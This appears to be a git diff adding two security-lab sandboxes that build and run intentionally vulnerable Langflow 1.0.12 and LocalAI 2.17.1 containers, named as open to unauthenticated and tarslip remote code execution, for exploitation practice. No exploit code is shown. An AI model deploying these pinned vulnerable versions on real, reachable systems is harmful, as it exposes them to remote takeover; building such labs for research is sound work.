a/sandboxes/llm_local_langflow_v1.0.12/Containerfile-bak b/sandboxes/llm_local_langflow_v1.0.12/Containerfile-bak new file mode 100644 index 0000000..13820af --- /dev/null +++ b/sandboxes/llm_local_langflow_v1.0.12/Containerfile-bak @@ -0,0 +1,23 @@ +# sandboxes/Langflow-CVE-2024-37014/Containerfile +FROM python:3.11-slim + +# System dependencies +RUN apt-get update && apt-get install -y \ + libgl1 \ + curl \ + && rm -rf /var/lib/apt/lists/* + +WORKDIR /app + +# Pinning vulnerable Langflow and its specific dependencies +RUN pip install --no-cache-dir \ + langflow==1.0.12 \ + "setuptools>=45,<81" \ + "typer==0.9.0" \ + "click==8.1.7" + +# Expose Langflow UI/API port +EXPOSE 7860 + +# Podman/Docker entrypoint +CMD ["langflow", "run", "--host", "0.0.0.0", "--port", "7860"] diff --git a/sandboxes/llm_local_langflow_v1.0.12/Makefile b/sandboxes/llm_local_langflow_v1.0.12/Makefile new file mode 100644 index 0000000..9abcfbb --- /dev/null +++ b/sandboxes/llm_local_langflow_v1.0.12/Makefile @@ -0,0 +1,49 @@ +# sandboxes/Langflow-CVE-2024-37014/Makefile +IMAGE_NAME := langflow +CONTAINER_NAME := langflow +PORT := 7860 + +.PHONY: all build run stop attack clean + +all: build run + +build: + podman build -f Containerfile -t $(IMAGE_NAME) . + +run: + podman run -d \ + --name $(CONTAINER_NAME) \ + --network host \ + $(IMAGE_NAME) + @echo "" + @echo " [+] Langflow v1.0.12 running at http://localhost:$(PORT)" + @echo " [+] CVE-2024-37014 (unauthenticated RCE) is exploitable." + @echo "" + +attack: all + +stop: + podman stop $(CONTAINER_NAME) 2>/dev/null || true + podman rm $(CONTAINER_NAME) 2>/dev/null || true + +clean: stop + podman rmi $(IMAGE_NAME) 2>/dev/null || true +format: + @echo "[*] Running black formatter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + elif command -v black >/dev/null 2>&1; then \ + black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + else \ + echo " [-] black not found. Install with: pip install black"; \ + fi + @echo "[*] Running isort import sorter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + elif command -v isort >/dev/null 2>&1; then \ + isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + else \ + echo " [-] isort not found. Install with: pip install isort"; \ + fi + @echo "[+] Formatting complete!" + diff --git a/sandboxes/llm_local_langflow_v1.0.12/README.md b/sandboxes/llm_local_langflow_v1.0.12/README.md new file mode 100644 index 0000000..ff0a813 --- /dev/null +++ b/sandboxes/llm_local_langflow_v1.0.12/README.md @@ -0,0 +1,77 @@ +# Langflow Sandbox + +This sandbox environment deploys a vulnerable instance of Langflow (v1.0.12). It is designed for security researchers to practice exploitation techniques against GenAI orchestration frameworks, specifically focusing on unauthenticated Remote Code Execution (RCE). + +--- + + +## Prerequisites + +- Podman (preferred) or Docker +- Make utility + +> **Note:** Ensure port `7860` is not being used by a local installation of Langflow before starting the sandbox. + +--- + +## Setup and Lifecycle + +This lab uses a `Makefile` to simplify container management using Podman. + +### 1. Build and Start the Sandbox + +This will build the image and start the container in detached mode. + +```bash +make all +``` + +### 2. Verify the Environment + +Check if the service is running: + +```bash +podman ps +``` + +The Langflow UI should be accessible at: + +``` +http://localhost:7860 +``` + +--- + +### 3. Running an Attack + +To trigger the automated attack (in the `exploitation` directory ) First you have to start a listener : + + ```bash +make listen +``` +after that you can run the automated attack + +```bash +make attack +``` + +--- + +### 4. Stop and Cleanup + +To stop the container and remove the image: + +```bash +make clean +``` + +--- + +## Directory Structure + +``` +sandboxes/Langflow-CVE-2024-37014/ +├── Containerfile # Podman definition for the vulnerable environment +├── Makefile # Automation for build/run/stop/attack +└── README.md # Documentation +``` diff --git a/sandboxes/llm_local_localAI_v2.17.1/Containerfile b/sandboxes/llm_local_localAI_v2.17.1/Containerfile new file mode 100644 index 0000000..e028c4c --- /dev/null +++ b/sandboxes/llm_local_localAI_v2.17.1/Containerfile @@ -0,0 +1,21 @@ +FROM docker.io/library/ubuntu:22.04 + +RUN apt-get update && apt-get install -y \ + ca-certificates \ + curl \ + ffmpeg \ + && rm -rf /var/lib/apt/lists/* + +WORKDIR /app + +RUN curl -fsSL \ + https://github.com/mudler/LocalAI/releases/download/v2.17.1/local-ai-Linux-x86_64 \ + -o local-ai \ + && chmod +x local-ai + +RUN mkdir -p /app/models + +EXPOSE 8080 + +ENTRYPOINT ["/app/local-ai"] +CMD ["--address", "0.0.0.0:8080", "--models-path", "/app/models"] diff --git a/sandboxes/llm_local_localAI_v2.17.1/Makefile b/sandboxes/llm_local_localAI_v2.17.1/Makefile new file mode 100644 index 0000000..ae89069 --- /dev/null +++ b/sandboxes/llm_local_localAI_v2.17.1/Makefile @@ -0,0 +1,53 @@ +IMAGE_NAME := localai +CONTAINER_NAME := localai + +.PHONY: all build run attack stop clean + +## Build the container image +build: + podman build -f Containerfile -t $(IMAGE_NAME) . + +## Start the vulnerable LocalAI instance +run: + podman run -d \ + --name $(CONTAINER_NAME) \ + --network host \ + localhost/$(IMAGE_NAME) + @echo "" + @echo " [+] LocalAI v2.17.1 is running at http://localhost:8080" + @echo " [+] CVE-2024-6868 (tarslip / arbitrary write -> RCE) is exploitable." + @echo "" + +## Build + run (default target) +all: build run + +## Alias used by exploitation scripts to spin up the target +attack: all + +## Stop and remove the running container +stop: + podman stop $(CONTAINER_NAME) 2>/dev/null || true + podman rm $(CONTAINER_NAME) 2>/dev/null || true + +## Stop the container and delete the image +clean: stop + podman rmi $(IMAGE_NAME) 2>/dev/null || true +format: + @echo "[*] Running black formatter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + elif command -v black >/dev/null 2>&1; then \ + black $(shell find . -name "*.py") 2>/dev/null && echo " [+] black done" || echo " [-] black failed or no .py files found"; \ + else \ + echo " [-] black not found. Install with: pip install black"; \ + fi + @echo "[*] Running isort import sorter..." + @if command -v uv >/dev/null 2>&1; then \ + uv run isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + elif command -v isort >/dev/null 2>&1; then \ + isort $(shell find . -name "*.py") 2>/dev/null && echo " [+] isort done" || echo " [-] isort failed or no .py files found"; \ + else \ + echo " [-] isort not found. Install with: pip install isort"; \ + fi + @echo "[+] Formatting complete!" + diff --git a/sandboxes/llm_local_localAI_v2.17.1/README.md b/sandboxes/llm_local_localAI_v2.17.1/README.md new file mode 100644 index 0000000..2e2317f --- /dev/null +++ b/sandboxes/llm_local_localAI_v2.17.1/README.md @@ -0,0 +1,50 @@ +# LocalAI Sandbox +This sandbox environment deploys a vulnerable instance of LocalAI (v2.17.1). It is designed for security researchers to practice exploitation techniques against self-hosted AI engines, specifically focusing on arbitrary file write leading to Remote Code Execution (RCE) via a tarslip vulnerability. + +--- + + +## Prerequisites +- Podman (preferred) or Docker +- Make utility + +> **Note:** Ensure port `8080` is not being used by another local service before starting the sandbox. + +--- + +## Setup and Lifecycle +This lab uses a `Makefile` to simplify container management using Podman. + +### 1. Build and Start the Sandbox +This will build the image and start the container in detached mode. +```bash +make all +``` + +### 2. Verify the Environment +Check if the service is running: +```bash +podman ps +``` +The LocalAI UI should be accessible at: +``` +http://localhost:8080 +``` + +--- + +### 3. Stop and Cleanup +To stop the container and remove the image: +```bash +make clean +``` + +--- + +## Directory Structure +``` +sandboxes/LocalAI-CVE-2024-6868/ +├── Containerfile # Podman definition for the vulnerable environment +├── Makefile # Automation for build/run/stop/attack +└── README.md # Documentation +```